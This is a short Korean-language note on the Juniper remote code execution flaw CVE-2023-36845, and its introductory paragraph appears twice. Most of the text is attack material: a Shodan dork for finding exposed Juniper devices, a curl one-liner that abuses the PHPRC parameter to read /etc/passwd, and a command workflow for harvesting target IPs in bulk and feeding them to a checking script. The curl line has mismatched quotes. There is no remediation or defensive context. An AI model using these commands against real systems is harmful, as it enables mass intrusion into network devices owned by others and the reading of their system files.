
Juniper RCE(원격 코드 실행) CVE-2023-36845는 Juniper 소프트웨어에서 식별된 취약점입니다. 이 특정 결함은 원격 코드 실행을 허용하며, 즉 공격자가 장치에 물리적으로 접근하지 않고도 시스템에서 임의의 코드를 실행할 수 있음을 의미합니다.
Juniper RCE (Remote Code Execution) CVE-2023-36845는 Juniper 소프트웨어에서 확인된 취약점입니다. 이 특정 결함은 원격 코드 실행을 허용하며, 이는 공격자가 장치에 물리적 접근 없이 시스템에서 임의의 코드를 실행할 수 있음을 의미합니다.
Shodan dork: http.favicon.hash:2141724739
보다 타겟팅된 검색을 위해 SSL 인증서, 조직명 등의 관련 dork와 함께 사용하십시오.
curl -k https://$IP/about.php?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"’
└─# shodan download Juniper 'http.favicon.hash:2141724739 ssl:domain.com’ #download from shodan
└─# shodan parse Juniper.json.gz --fields ip_str,port >unfiltered_IP_Ports.txt
└─# awk '{print $1":"$2}' unfiltered_IP_Ports.txt >juniper-final.txt
└─# ./Juniper-RCE-check.sh -f juniper-final.txt
